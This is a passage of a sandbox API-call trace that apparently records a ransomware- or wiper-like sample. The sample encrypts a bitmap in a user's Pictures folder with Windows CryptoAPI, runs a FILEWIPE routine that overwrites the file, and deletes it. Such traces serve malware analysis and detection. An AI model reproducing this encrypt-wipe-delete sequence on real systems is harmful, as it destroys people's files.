hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.953] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.953] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.953] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.954] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.954] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.954] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0039.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.954] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.954] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.954] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.954] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.955] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.955] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.955] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.955] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.956] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x123cb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x123d0) returned 1 [0039.956] CharLowerBuffW (in: lpsz="byte[74705]", cchLength=0xb | out: lpsz="byte[74705]") returned 0xb [0039.957] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.957] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9597b8*, pdwDataLen=0x6ae220*=0x123cb, dwBufLen=0x123d0 | out: pbData=0x9597b8*, pdwDataLen=0x6ae220*=0x123d0) returned 1 [0039.957] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.966] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.967] CryptDestroyKey (hKey=0x7c2280) returned 1 [0039.967] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.967] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.968] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.968] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0039.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.968] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.971] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.971] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f309b90, ftCreationTime.dwHighDateTime=0x1d5bad4, ftLastAccessTime.dwLowDateTime=0x14b56b20, ftLastAccessTime.dwHighDateTime=0x1d5bea6, ftLastWriteTime.dwLowDateTime=0x14b56b20, ftLastWriteTime.dwHighDateTime=0x1d5bea6, nFileSizeHigh=0x0, nFileSizeLow=0x123cb, dwReserved0=0x0, dwReserved1=0x777648, cFileName="QZEtzxM.bmp", cAlternateFileName="")) returned 0x7c2240 [0039.971] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.971] CharLowerBuffW (in: lpsz="byte[74699]", cchLength=0xb | out: lpsz="byte[74699]") returned 0xb [0039.972] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.972] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.972] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.972] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.973] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.973] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.973] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\qzetzxm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.973] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.974] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.974] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.975] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.975] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.975] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.975] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.975] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", lpFilePart=0x0) returned 0x62 [0039.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f309b90, ftCreationTime.dwHighDateTime=0x1d5bad4, ftLastAccessTime.dwLowDateTime=0x14b56b20, ftLastAccessTime.dwHighDateTime=0x1d5bea6, ftLastWriteTime.dwLowDateTime=0x1789e8a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x123cb, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="QZEtzxM.bmp", cAlternateFileName="")) returned 0x7c2240 [0039.975] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\qzetzxm.bmp")) returned 1 [0039.977] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f309b90, ftCreationTime.dwHighDateTime=0x1d5bad4, ftLastAccessTime.dwLowDateTime=0x14b56b20, ftLastAccessTime.dwHighDateTime=0x1d5bea6, ftLastWriteTime.dwLowDateTime=0x1789e8a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x123cb, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="QZEtzxM.bmp", cAlternateFileName="")) returned 0 [0039.977] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.977] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.977] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, 